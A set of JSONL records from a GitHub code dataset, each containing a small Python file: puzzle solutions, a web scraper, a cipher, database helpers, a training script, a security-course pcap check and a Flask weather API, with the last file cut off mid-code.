KEY,\n privilege_name TEXT NOT NULL\n ) WITHOUT ROWID\n \"\"\",\n \"DROP TABLE IF EXISTS privileges\")\n]\n","repo_name":"fredmanglis/gn-auth","sub_path":"migrations/auth/20221108_02_wxTr9-create-privileges-table.py","file_name":"20221108_02_wxTr9-create-privileges-table.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20514599934","text":"# N-Queen\ndef queen(row):\n global cnt\n if row == N:\n cnt += 1\n return\n\n for col in range(N):\n if cols[col] == 0:\n for i in range(row):\n if row - i == abs(col - diagonal[i]):\n break\n else:\n cols[col] = 1\n diagonal[row] = col\n queen(row+1)\n cols[col] = 0\n \nN = int(input())\ndiagonal = [0] * N\ncols = [0] * N\ncnt = 0\n\nqueen(0)\nprint(cnt)","repo_name":"SystemOutGirlsAlgorithm/algorithm","sub_path":"9월/2022-09-24/baekjoon_9663_뚜망.py","file_name":"baekjoon_9663_뚜망.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"15019591673","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"Provides method for using Vigenère's cipher.\"\"\"\n\nimport caesar_cipher\n\ndef cipher(key, text, decipher = 0):\n \"\"\"Ciphers or deciphers 'text' using 'key'.\"\"\"\n r = ''\n ki = 0\n for c in text:\n if c.isalpha():\n nki = (ord(key[ki].lower()) - 97) % 26\n if decipher:\n r += caesar_cipher.shift(nki, c, decipher=1)\n else:\n r += caesar_cipher.shift(nki, c)\n ki = (ki + 1) % len(key)\n else:\n r += c\n return r\n","repo_name":"S8A/datacipher","sub_path":"vigenere_cipher.py","file_name":"vigenere_cipher.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36389102245","text":"#! /usr/bin/env python3\n\nimport asyncio\nimport urllib.parse\n\nimport lxml # type: ignore\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom selenium.common.exceptions import TimeoutException # type: ignore\nfrom selenium.webdriver.chrome.webdriver import WebDriver # type: ignore\nfrom selenium.webdriver.common.by import By # type: ignore\nfrom selenium.webdriver.support.ui import WebDriverWait # type: ignore\nfrom selenium.webdriver.support import expected_conditions # type: ignore\n\nfrom ff14angler.constants.values import (\n ANGLER_BASE_URL,\n ANGLER_PAGE_LOAD_WAIT_DURATION,\n ANGLER_DELAY_BETWEEN_REQUESTS_DURATION\n)\nfrom ff14angler.dataClasses.bait.bait import Bait\nfrom ff14angler.dataClasses.bait.baitProvider import BaitProvider\nfrom ff14angler.dataClasses.comment.commentSection import CommentSection\nfrom ff14angler.exceptions.networkException import NetworkException\nfrom ff14angler.scraper.lodestoneImageScraper import LodestoneImageScraper\nfrom ff14angler.network.delayOnReleaseLock import DelayOnReleaseLock\n\n\nclass BaitScraper:\n\n @staticmethod\n async def update_bait_with_large_icon_url(bait: Bait, driver: WebDriver):\n if bait.bait_angler_lodestone_url:\n if bait.bait_icon_url is None:\n raise ValueError(f'Missing icon url from xivapi: {bait}')\n\n bait.bait_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=bait.bait_icon_url,\n lodestone_url=bait.bait_angler_lodestone_url\n )\n\n @staticmethod\n async def ensure_all_bait_mooch_fish_up_to_date():\n for bait_id, bait in BaitProvider.bait_holder.items():\n if bait.bait_angler_is_mooch_fish:\n await bait.update_bait_with_assume_is_mooch_fish(False)\n\n @classmethod\n async def collect_bait_data(cls, driver: WebDriver):\n bait_url_template = urllib.parse.urljoin(ANGLER_BASE_URL, '/bait/')\n lock = DelayOnReleaseLock(ANGLER_DELAY_BETWEEN_REQUESTS_DURATION)\n\n for bait_id, bait in BaitProvider.bait_holder.items():\n angler_url: str = urllib.parse.urljoin(bait_url_template, str(bait_id))\n for attempt in range(3):\n driver.get('about:blank')\n print(f'Scraping page: {angler_url}')\n driver.get(angler_url)\n\n try:\n WebDriverWait(driver, ANGLER_PAGE_LOAD_WAIT_DURATION).until(\n expected_conditions.presence_of_element_located(\n (By.CSS_SELECTOR, 'form.comment_form')\n )\n )\n\n async with lock:\n await asyncio.sleep(2)\n html: str = driver.page_source\n\n await bait.update_bait_with_comment_section(\n await CommentSection.get_comment_section_from_web_driver(driver)\n )\n break\n except (NetworkException, TimeoutException, ValueError,):\n if attempt == 2:\n raise\n\n await bait.update_bait_with_bait_soup(BeautifulSoup(html, lxml.__name__))\n await cls.update_bait_with_large_icon_url(bait, driver)\n","repo_name":"joshua-software-dev/FF14AnglerParser","sub_path":"ff14angler/scraper/baitScraper.py","file_name":"baitScraper.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23956237045","text":"import re\n\nfrom symptom_tagger.TextAnalyse.text_preprocessing import main_text\ngenes_list = []\nsymptoms_list = []\n\nwith open('symptom_tagger/TextAnalyse/genes.txt', 'r') as inputFile1:\n # loop through each line in file\n for line in inputFile1:\n line = line.strip()\n # print(line)\n genes_list.append(line)\n\n\nwith open('symptom_tagger/TextAnalyse/symptoms_v3.txt', 'r') as inputFile:\n # loop through each line in file\n for line in inputFile:\n line = line.strip()\n symptoms_list.append(line)\n\n\ndef match_symptoms(search):\n\n \"\"\"Get the perfect symptom matches related to the search phrases\"\"\"\n\n text = \"\"\n\n for item in search:\n sentence = re.sub(r'<\\/?[^>]*>', '', item)\n # print(\"1st\")\n # print(sentence)\n pattern = r'(.*?)<\\/c>'\n noun_prases = re.findall(pattern, item, flags=0)\n # print(symptoms)\n for s in noun_prases:\n # new_sent = \"\"\n for symptom in symptoms_list:\n if symptom.lower() == s.lower():\n # print token\n sentence = sentence.replace(s, \"\" + s + \"\", 1)\n break\n text += ' '+sentence\n # print(text)\n return text\n\n\ndef symptoms_tagger(x):\n\n search = main_text(x)\n\n tagged_symptom_list = match_symptoms(search)\n return tagged_symptom_list\n","repo_name":"terannadee/Disease-symptoms-Relation-Extraction","sub_path":"symptom_tagger/TextAnalyse/fuzzy.py","file_name":"fuzzy.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26028696367","text":"import pymysql\r\n\r\nclass jdbc_connect:\r\n cursor=\"\";\r\n db=False;\r\n\r\n def __init__(self,host,username,password,database):\r\n try:\r\n jdbc_connect.db = pymysql.connect(host, username,password, database, charset=\"utf8\");\r\n jdbc_connect.cursor = self.db.cursor();\r\n except BaseException:\r\n print(\"连接数据库异常\")\r\n self.db.close()\r\n\r\n def select(self,sql):\r\n jdbc_connect.cursor.execute(sql);\r\n students=self.cursor.fetchall();\r\n return students;\r\n\r\n def insert(self,sql):\r\n try:\r\n jdbc_connect.cursor.execute(sql);\r\n jdbc_connect.db.commit();\r\n except pymysql.DataError:\r\n jdbc_connect.db.rollback();\r\n print(\"执行添加操作失败\")\r\n return \"1\"\r\n else:\r\n return \"0\"\r\n\r\n def update(self,sql):\r\n try:\r\n jdbc_connect.cursor.execute(sql);\r\n jdbc_connect.db.commit();\r\n except pymysql.DataError:\r\n jdbc_connect.db.rollback();\r\n print(\"执行修改操作失败\")\r\n return \"1\"\r\n else:\r\n return \"0\"\r\n\r\n def delete(self,sql):\r\n try:\r\n jdbc_connect.cursor.execute(sql);\r\n jdbc_connect.db.commit();\r\n except pymysql.DataError:\r\n jdbc_connect.db.rollback();\r\n print(\"执行删除操作失败\")\r\n return \"1\"\r\n else:\r\n return \"0\"\r\n\r\n def closedb(self):\r\n try:\r\n self.cursor.close();\r\n self.db.close();\r\n except BaseException:\r\n print(\"db close error\")\r\n","repo_name":"lantings/source","sub_path":"doumingquan/python3/module/jdbc_jaydebeapi/jdbcs.py","file_name":"jdbcs.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4825839367","text":"from bika.ui import PROFILE_ID\nfrom bika.ui import logger\nfrom bika.ui.interfaces import IBikaUILayer\nfrom plone.api.portal import set_registry_record\nfrom plone.registry.interfaces import IRegistry\nfrom zope.component import getUtility\nfrom bika.lims.api import get_request\nfrom senaite.core.setuphandlers import _run_import_step\n\n\ndef is_installed():\n request = get_request()\n return IBikaUILayer.providedBy(request)\n\n\ndef install(context):\n if context.readDataFile(\"bika.ui.default.txt\") is None:\n return\n logger.info(\"BIKA.UI install handler [BEGIN]\")\n portal = context.getSite()\n _run_import_step(portal, \"skins\", PROFILE_ID)\n _run_import_step(portal, \"browserlayer\", PROFILE_ID)\n add_languages(portal)\n logger.info(\"BIKA.UI install handler [DONE]\")\n\n\ndef post_install(portal_setup):\n pass\n\n\ndef uninstall(context):\n if context.readDataFile(\"bika.ui.uninstall.txt\") is None:\n return\n portal = context.getSite()\n reset_settings(portal)\n\n\ndef reset_settings(portal):\n \"\"\"Reset the settings from registry to match with defaults\n \"\"\"\n logger.info(\"BIKA.UI Reset core registry defaults\")\n root = \"/++plone++senaite.core.static\"\n default_settings = {\n \"plone.site_title\": u\"SENAITE LIMS\",\n \"senaite.toolbar_logo\": u\"{}/images/senaite.svg\".format(root),\n \"senaite.toolbar_logo_styles\": {\"height\": \"15px\"},\n }\n\n for key, val in default_settings.items():\n set_registry_record(key, val)\n\n logger.info(\"BIKA.UI Reset core registry defaults [DONE]\")\n\n\ndef add_languages(portal):\n \"\"\"Add en-gb language\n \"\"\"\n registry = getUtility(IRegistry)\n if 'plone.available_languages' in registry:\n languages = registry['plone.available_languages']\n if 'en-gb' not in languages:\n languages.append('en-gb')\n registry['plone.available_languages'] = languages\n","repo_name":"bikalims/bika.ui","sub_path":"src/bika/ui/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19644435974","text":"from enum import Enum\nfrom src.syntax.expressions import Expression\n\n\nclass ConditionTypes(Enum):\n ISTRUE = 0\n ISFALSE = 1\n GREATER = 2\n LESSER = 3\n GREATEROREQUAL = 4\n LESSEROREQUAL = 5\n EQUAL = 6\n\n\nclass Condition:\n conditionDict = {\n \"less\": ConditionTypes.LESSER,\n \"equal\": ConditionTypes.EQUAL,\n \"greater\": ConditionTypes.GREATER\n }\n\n __conditionMap = {\n ConditionTypes.LESSER: \"<\",\n ConditionTypes.EQUAL: \"==\",\n ConditionTypes.GREATER: \">\"\n }\n\n def __init__(self, tokens, scope=None):\n self.__tokens = tokens\n self.scope = scope\n self.__parse()\n\n def __parse(self):\n # Looks for condition keywords\n for i, token in enumerate(self.__tokens):\n if token == \"is\" and self.__tokens[i + 1] in [\"less\", \"equal\", \"greater\"] and self.__tokens[i + 2] in [\n \"than\", \"to\"]:\n # Parses expressions before and after the condition keywords\n first_tokens = self.__tokens[0:i]\n second_tokens = self.__tokens[i + 3:len(self.__tokens)]\n self.first_expression = Expression(first_tokens, self.scope)\n self.second_expression = Expression(second_tokens, self.scope)\n self.conditionType = self.conditionDict[self.__tokens[i + 1]]\n\n def usesSingleValue(self):\n return self.second_expression is None\n\n def toPython(self):\n if not self.usesSingleValue():\n return f\"({self.first_expression.toPython()}){self.__conditionMap[self.conditionType]}({self.second_expression.toPython()})\"\n","repo_name":"Sherif-Abdou/ezpy","sub_path":"src/syntax/conditions/condition.py","file_name":"condition.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35890397928","text":"\"\"\"\nPre_defined values for axi4 signals in case uart slave\nx= 'R' or 'W'\n\"\"\"\n\n\"\"\"\nthere is doubt in re initializing the ready and valid signals\n\"\"\"\nAxID = 0b0001\nARID = 0\nAxPROT = 0b000\nburst_type = \"FIXED\"\nWID = 0b0001\nBaud_WSTRB = 0x03\nTx_Rx_WSTRB = 0x01","repo_name":"cbkathir/shakti_intern","sub_path":"simple-uart/tests/uart_predefined_signals.py","file_name":"uart_predefined_signals.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7936560741","text":"import sys\nsys.stdin = open('15684.txt', 'r')\n\nimport itertools, collections\nW, M, H = map(int, input().split())\nL = [[0 for _ in range(W)] for _ in range(H)]\n\nfor _ in range(M):\n a, b = map(int, input().split())\n L[a-1][b-1] += 2\n L[a-1][b] += 3\n# for l in L:\n# print(l)\n\n\ndef check(): # r, c\n for c in range(W):\n cc = c # c copy\n r = 0\n while cc < W and r < H:\n while r + 1 < H and not L[r][cc]:\n r += 1\n if L[r][cc] == 2:\n if L[r][cc+1] == 3:\n r += 1\n cc += 1\n continue\n if L[r][cc] == 3:\n if L[r][cc-1] == 2:\n r += 1\n cc += -1\n continue\n r += 1\n if c != cc:\n return False\n return True\n\n\ndef construction(comb):\n cnt = 0\n for c in comb:\n w, h = c[0], c[1]\n if L[h][w]:\n break\n else:\n L[h][w] = 2\n L[h][w + 1] = 3\n cnt += 1\n else:\n if check():\n return len(comb)\n\n for c in comb[:cnt]:\n w, h = c[0], c[1]\n L[h][w] = 0\n L[h][w + 1] = 0\n\n\ndef make_ladder():\n ladder_list = []\n for h in range(H):\n for w in range(W-1):\n if not L[h][w]:\n if not L[h][w+1]:\n ladder_list += [(w, h)]\n\n for k in range(1, 4):\n ladder_comb = collections.deque(itertools.combinations(ladder_list, k))\n while ladder_comb:\n tmp = construction(ladder_comb.popleft()) # 조합 한 쌍씩\n if tmp:\n return tmp\n return -1\n\n\ndef main():\n if check():\n return print(0)\n return print(make_ladder())\n\n\nmain()\n# 271664\t1836","repo_name":"anyl92/ALGORITHM","sub_path":"baek/baek_15684_ladder.py","file_name":"baek_15684_ladder.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"67455327","text":"import requests\r\nimport time\r\nimport logging\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass WeatherService:\r\n def __init__(self, lat, lon, apiKey, dataRefreshTime):\r\n self.lat = lat\r\n self.lon = lon\r\n self.apiKey = apiKey\r\n self.dataRefreshTime = dataRefreshTime\r\n self.weatherId=0\r\n self.weatherString=\"Unknown\"\r\n self.temp=0\r\n self.tempFeel=0\r\n self.pressure=0\r\n self.humidity=0\r\n self.windSpeed=0\r\n self.windDir=0\r\n self.clouds = 0\r\n self.rain1h=0\r\n self.snow1h=0\r\n self.dataTimeLin=0\r\n #fetch initial data\r\n self.fetchData()\r\n \r\n def getData(self):\r\n if time.time() - self.fetchTime >= self.dataRefreshTime:\r\n #its time to fetch new data\r\n self.fetchData()\r\n return { \"weatherId\": self.weatherId,\r\n \"temp\": self.temp, \"tempFeel\": self.tempFeel, \"press\": self.pressure,\r\n \"humid\": self.humidity, \"ws\": self.windSpeed, \"wd\": self.windDir,\r\n \"clouds\": self.clouds, \"rain\": self.rain1h, \"snow\": self.snow1h,\r\n \"dt\": self.dataTimeLin }\r\n\r\n \r\n def fetchData(self):\r\n self.fetchTime = time.time()\r\n try:\r\n response = requests.get(\r\n \"https://api.openweathermap.org/data/2.5/weather?lat={}&lon={}&appid={}&units=metric\"\r\n .format(self.lat,self.lon,self.apiKey))\r\n except ConnectionError as e:\r\n logger.error(\"Error while reading weather data (Connection Error): {}\".format(e))\r\n else:\r\n if response.status_code != 200:\r\n logger.error(\"Error while reading weather data, response status: {}\".format(response.status_code))\r\n responseJson = response.json()\r\n if not responseJson:\r\n logger.error(\"Error while reading weather data, no JSON in response\")\r\n return { \"status\": -1}\r\n #basic weather info\r\n if 'weather' in responseJson: \r\n self.weatherId=responseJson['weather'][len(responseJson['weather'])-1]['id'] \r\n self.weatherString=responseJson['weather'][len(responseJson['weather'])-1]['main']\r\n #atmospherical info\r\n if 'main' in responseJson: \r\n self.temp=responseJson['main']['temp']\r\n self.tempFeel=responseJson['main']['feels_like']\r\n self.pressure=responseJson['main']['pressure']\r\n self.humidity=responseJson['main']['humidity']\r\n #wind info\r\n if 'wind' in responseJson:\r\n self.windSpeed=responseJson['wind']['speed']\r\n self.windDir=responseJson['wind']['deg']\r\n #clouds info\r\n if 'clouds' in responseJson:\r\n self.clouds=responseJson['clouds']['all']\r\n #rain\r\n if 'rain' in responseJson:\r\n self.rain1h=responseJson['rain']['1h']\r\n #snow\r\n if 'snow' in responseJson:\r\n self.snow1h=responseJson['snow']['1h']\r\n if 'dt' in responseJson:\r\n self.dataTimeLin=responseJson['dt']\r\n logger.debug(\"WeatherService: Fetched new data\")\r\n \r\n","repo_name":"martinbusa/LoxoneAdvancedController","sub_path":"home_libs/weatherservice.py","file_name":"weatherservice.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8891045374","text":"from utils import load_data\nfrom MLP import mlp\nimport torch\nimport torchvision\nfrom torch.nn import Module\nimport cifar10 as dataset\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom logentropy import LogEntropyLoss\n\n\n\nepochs = 2000\n\nlr = 0.1\nlabel = \"l1loss_4classeswithMLP\"\n\n\n\ndef train(train_loader, model, optimizer, train_criterion, use_cuda, epoch):\n sum_loss = 0.0\n for data in train_loader:\n img, label = data\n if use_cuda:\n img = Variable(img).cuda()\n label = Variable(label).cuda()\n else:\n img = Variable(img)\n label = Variable(label)\n out = model(img)\n loss = train_criterion(out, label)\n print_loss = loss.data.item()\n sum_loss += print_loss\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print('Epoch', epoch, 'Train Loss:', sum_loss)\n return sum_loss\n\ndef watch(watch_loader, model, watch_criterion, use_cuda, epoch):\n sum_loss = 0.0\n with torch.no_grad():\n for data in watch_loader:\n val_inputs, label = data\n if use_cuda:\n val_inputs = Variable(val_inputs).cuda()\n label = Variable(label).cuda()\n val_outputs = model(val_inputs)\n loss = watch_criterion(val_outputs, label)\n print_loss = loss.data.item()\n sum_loss += print_loss\n print('Epoch:', epoch, 'True Loss:', sum_loss)\n return sum_loss\n\ndef valid(valid_loader, model, use_cuda, epoch):\n total_correct = 0.0\n total_num = 0.0\n with torch.no_grad():\n for data in valid_loader:\n val_inputs, label = data\n if use_cuda:\n val_inputs = Variable(val_inputs).cuda()\n label = Variable(label).cuda()\n val_outputs = model(val_inputs)\n pred = val_outputs.argmax(dim=1)\n total_correct += torch.eq(pred,label).float().sum().item() #分别为是否相等,scalar tensor转换为float,求和,拿出值\n total_num += label.size(0)\n acc = total_correct/total_num\n print('Epoch:', epoch, 'Val Acc:', acc)\n return acc \n\ndef plot_curve(epochs, train_losses, true_losses, valid_accs, label):\n epoch_num = epochs\n x1 = range(0, epoch_num)\n x2 = range(0, epoch_num)\n x3 = range(0, epoch_num)\n plt.subplot(3, 1, 1)\n plt.plot(x1, valid_accs, 'o-')\n plt.ylabel('Val Acc')\n plt.subplot(3, 1, 2)\n plt.plot(x2, train_losses, '.-')\n plt.ylabel('Train Loss')\n plt.subplot(3, 1, 3)\n plt.plot(x3, true_losses, '.-')\n plt.xlabel('epochs')\n plt.ylabel('True Loss')\n plt.savefig('./logs/'+label +\".png\")\n\ndef log(tag, train_loss, true_loss, val_acc, e_losses, c_losses):\n data = {'train loss':train_loss, \"true loss\":true_loss, \"val acc\":val_acc, 'loss term 1':e_losses, 'loss term 2':c_losses}\n df = pd.DataFrame(data)\n df.to_csv('./logs/'+label+tag+'.csv')\n\n\ndef main():\n use_cuda = torch.cuda.is_available()\n print(\"cuda:\",use_cuda)\n model = mlp()\n if use_cuda:\n model = model.cuda()\n train_loader, watch_loader, valid_loader = load_data()\n train_criterion = torch.nn.L1Loss()\n #ce_loss = LogEntropyLoss()\n watch_criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=1e-4)\n # optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[100], gamma=0.1)\n train_losses = []\n true_losses = []\n valid_accs = []\n for epoch in range(epochs):\n train_loss = train(train_loader, model, optimizer, train_criterion, use_cuda, epoch)\n train_losses.append(train_loss)\n true_loss = watch(watch_loader, model, watch_criterion, use_cuda, epoch)\n true_losses.append(true_loss)\n val_acc = valid(valid_loader, model, use_cuda, epoch)\n valid_accs.append(val_acc)\n # if epoch % 200 == 1:\n # log(str(epoch), train_losses, true_losses, valid_accs, entropy_losses, cons_losses)\n scheduler.step()\n #log(str(epoch), train_losses, true_losses, valid_accs, entropy_losses, cons_losses)\n plot_curve(epochs, train_losses, true_losses, valid_accs, label)\n\n\nif __name__ == '__main__':\n main()\n \n \n\n","repo_name":"tangzyer/SubsetLosses","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70994874667","text":"\"\"\"Drop checksum on ImageStorage\n\nRevision ID: c91c564aad34\nRevises: 152bb29a1bb3\nCreate Date: 2018-02-21 12:17:52.405644\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'c91c564aad34'\ndown_revision = '152bb29a1bb3'\n\nfrom alembic import op as original_op\nfrom data.migrations.progress import ProgressWrapper\nimport sqlalchemy as sa\n\n\ndef upgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.drop_column('imagestorage', 'checksum')\n\n\ndef downgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.add_column('imagestorage', sa.Column('checksum', sa.String(length=255), nullable=True))\n","repo_name":"angry-tony/quay","sub_path":"data/migrations/versions/c91c564aad34_drop_checksum_on_imagestorage.py","file_name":"c91c564aad34_drop_checksum_on_imagestorage.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72777159146","text":"a = int(input('How many row to you want : '))\nb = int(input('Type 1 for ascending and 0 for descending prints : '))\nc = bool(b)\nif c == True:\n for i in range(1,a+1):\n for j in range(1,i+1):\n print('*',end=\" \")\n print()\nelif c == False:\n for i in range(a,0,-1):\n for j in range(1,i+1):\n print(\"*\",end=\" \")\n print()\n\n\n","repo_name":"KojoAning/PYHTON_PRACTICE","sub_path":"printing_pattern.py","file_name":"printing_pattern.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"353916117","text":"from dashmachine.dm.utils import resolve_onpress_option\n\n\nclass Title:\n def __init__(self, options):\n \"\"\"\n This section contains text that is below the icon (if present) on the card.\n\n :param options: (dict) the key/value pairs from this section of the\n card's config toml\n \"\"\"\n\n # parse string shorthand\n if isinstance(options.get(\"title\"), str):\n self.text = options[\"title\"]\n else:\n # apply user config dict\n for key, value in options.get(\"title\", {}).items():\n setattr(self, key, value)\n\n # set defaults\n if hasattr(self, \"onpress\"):\n self.onpress = resolve_onpress_option(self.onpress)\n","repo_name":"rmountjoy92/DashMachine-0.7","sub_path":"dashmachine/dm/dashboard_card/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"4421863234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 20 19:21:48 2019\r\nhttps://ktr89.hateblo.jp/entry/2019/03/21/220741\r\n@author: hfuji\r\n\"\"\"\r\n\r\nfrom benchmarker import Benchmarker\r\nimport numpy as np\r\n\r\nfrom modin import pandas as mpd\r\nimport pandas as ppd\r\nimport dask.dataframe as ddf\r\nimport dask.multiprocessing\r\n\r\ndef run(row, col, loop=3):\r\n\r\n df_random = ppd.DataFrame(np.random.randn(row, col))\r\n df_random.to_csv(\"random.csv\")\r\n\r\n with Benchmarker(loop) as bench:\r\n\r\n @bench(f'original pandas row:{row} col:{col}')\r\n def original_pandas_read(bm):\r\n ppd.read_csv('random.csv')\r\n\r\n\r\n @bench(f'modin pandas row:{row} col:{col}')\r\n def modin_read(bm):\r\n mpd.read_csv('random.csv')\r\n\r\n @bench(f'dask pandas row:{row} col:{col}')\r\n def dask_read(bm):\r\n df = ddf.read_csv('random.csv')\r\n df = df.compute()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n for r in [1, 10, 100,\r\n 1_000, 10_000, 100_000,\r\n 1_000_000, 10_000_000, 100_000_000]:\r\n run(row=r, col=273)\r\n ","repo_name":"hfujikawa/DataSci","sub_path":"modin_bench.py","file_name":"modin_bench.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24960031997","text":"#!/usr/bin/env python3\n\nimport unittest\nimport unittest.mock\nimport importlib\nimport sys\nimport pathlib\nimport random\nimport io\nimport socket\nimport os.path\n\nimport deliverable as student\n#import solution2 as student\n\nclass TestPart1(unittest.TestCase):\n def setUp(self):\n self.fname = 'packet.pcap'\n if os.path.isfile(self.fname):\n os.remove(self.fname)\n self.pcapfileheader = (0, 24, b'\\xa1\\xb2\\xc3\\xd4\\x00\\x02\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\x00\\x65')\n self.pcappackheader = (24, 16, b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x1c')\n self.ipheader = (40, 20, b'\\x45\\x00\\x00\\x1c\\x3a\\xa1\\x00\\x00\\xff\\x01\\xfe\\xee\\xc0\\xa8\\x00\\x01\\xc0\\xa8\\x00\\xff')\n self.icmpheader = (60, 8, b'\\x08\\x00\\xf7\\xfd\\x00\\x01\\x00\\x01')\n self.ihlval = (0x28, 1, 0xF, 0, 5, 'IHL Version')\n self.ipversion = (0x28, 1, 0xF0, 4, 4, 'IP Version')\n self.ipproto = (0x31, 1, 0xFF, 0, 1, 'IP Protocol')\n self.icmptype = (0x3C, 1, 0xFF, 0, 8, 'ICMP Type')\n self.checks = (self.ihlval, self.ipversion, self.ipproto, self.icmptype)\n\n def getPcapBytes(self, filename):\n with open(filename, 'rb') as fp:\n return fp.read()\n\n def validateBytes(self, offset, blen, act, exp):\n for x in range(offset, offset + blen + 1):\n self.assertEqual(act[x], exp[x])\n\n def test_pcap(self):\n student.createSmurfAttack()\n self.assertTrue(os.path.isfile(self.fname), 'File {} does not exist'.format(self.fname))\n pcapbytes = self.getPcapBytes(self.fname)\n self.assertEqual(len(pcapbytes), 68, 'Length of {} is incorrect'.format(self.fname))\n for check in self.checks:\n self.assertEqual((pcapbytes[check[0]] & check[2]) >> check[3], check[4], 'Invalid: {}'.format(check[5]))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Trist0ne/PRACTICE-PYTHON-CYB-","sub_path":"Triston Vaira/Python Gitlab/activities/pe3/part1/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70288635946","text":"import numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
    \"\n f\"1.
    Previous year's precipitation data: (/api/v1.0/precipitation)
    \"\n f\"2. List of all stations: (/api/v1.0/stations)
    \"\n f\"3. Previous year's temperature observations at the most active station: (/api/v1.0/tobs)
    \"\n f\"4. Min, Average & Max Temperatures for Date Range: (/api/v1.0/trip/[start date]/[end date])

    \"\n f\"Dates provided must be in yyyy-mm-dd format, if no end-date is provided, the trip api calculates stats through 23/08/2017
    \" \n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \"\"\"List all precipitation data for the previous year\"\"\"\n # Query precipitation data for previous year \n \n start = '2016-08-23'\n sel = [measurement.date, \n func.sum(measurement.prcp)]\n precipitation = session.query(*sel).\\\n filter(measurement.date >= start).\\\n group_by(measurement.date).\\\n order_by(measurement.date).all()\n \n session.close()\n\n # Output precipitation data for previous year\n dates = []\n totals = []\n\n for date, dailytotal in precipitation:\n dates.append(date)\n totals.append(dailytotal)\n \n precipitation_dict = dict(zip(dates, totals))\n\n return jsonify(precipitation_dict)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \"\"\"Output list of all the active Weather stations in Hawaii\"\"\"\n # Output list of active weather stations in Hawaii\n sel = [measurement.station]\n active_stations = session.query(*sel).\\\n group_by(measurement.station).all()\n session.close()\n\n list_of_stations = list(np.ravel(active_stations)) \n return 